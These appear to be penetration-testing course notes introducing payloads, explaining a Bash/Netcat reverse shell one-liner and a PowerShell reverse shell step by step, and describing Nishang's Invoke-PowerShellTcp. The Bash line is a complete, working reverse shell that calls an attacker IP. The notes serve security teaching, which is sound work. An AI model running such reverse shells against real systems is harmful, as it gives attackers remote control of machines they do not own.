search

Introduction to Payloads

Here are your notes on β€œIntroduction to Payloads” β€” broken down, simplified, and easy to revise πŸ“˜πŸ’‘

hashtag
πŸ” What Is a Payload?

  • In cybersecurity, a payload is the actual code/command delivered to a system to exploit it.

  • It executes a specific action (e.g., open a shell, steal data).

  • It can be blocked by defenses like antivirus (e.g., Windows Defender).

  • Think of it like the message in an email β€” it's what gets delivered and executed.

hashtag
πŸ’£ Bash/Netcat Reverse Shell One-Liner Breakdown

rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f

Step-by-step:

  1. rm -f /tmp/f; β†’ Removes the FIFO file if it exists.

  2. mkfifo /tmp/f; β†’ Creates a named pipe (FIFO).

  3. cat /tmp/f | β†’ Reads from the pipe.

  4. /bin/bash -i 2>&1 | β†’ Interactive Bash, redirects stderr to stdout.

  5. nc 10.10.14.12 7777 > /tmp/f β†’ Opens connection to attacker, sends output to the pipe.

πŸ“Œ Used on Linux to get a reverse shell via Netcat.

hashtag
🧠 PowerShell Reverse Shell One-Liner Breakdown

Step-by-step:

  1. powershell -nop -c β†’ Runs PowerShell with no profile and executes command.

  2. $client = ...TCPClient(IP, Port); β†’ Creates a TCP socket to attacker's IP.

  3. $stream = $client.GetStream(); β†’ Opens stream for communication.

  4. [byte[]]$bytes = 0..65535|%{0}; β†’ Creates an empty byte array.

  5. while(...) β†’ Listens for incoming commands.

  6. GetString(...) β†’ Converts bytes to readable text.

  7. iex $data β†’ Executes the received command (Invoke-Expression).

  8. Out-String β†’ Converts output to string.

  9. Get-Location β†’ Returns the prompt (e.g., PS C:>).

  10. GetBytes(...) β†’ Encodes output to send back.

  11. $stream.Write(...) β†’ Sends data back to attacker.

  12. $client.Close() β†’ Closes the connection.

πŸ“Œ Used on Windows for reverse shells via PowerShell.

hashtag
🧰 PowerShell TCP Shell Script Example (Nishang)

  • Invoke-PowerShellTcp is a function/script for reverse or bind shells.

  • Parameters:

    • -Reverse: connects to the attacker.

    • -Bind: listens for incoming connection.

  • Based on .NET TCPClient and TCPListener.

  • Automates reverse/bind connections for penetration testers.

🧩 Links to:

PreviousCreating PayloadsNextMetasploit Payloads

Last updated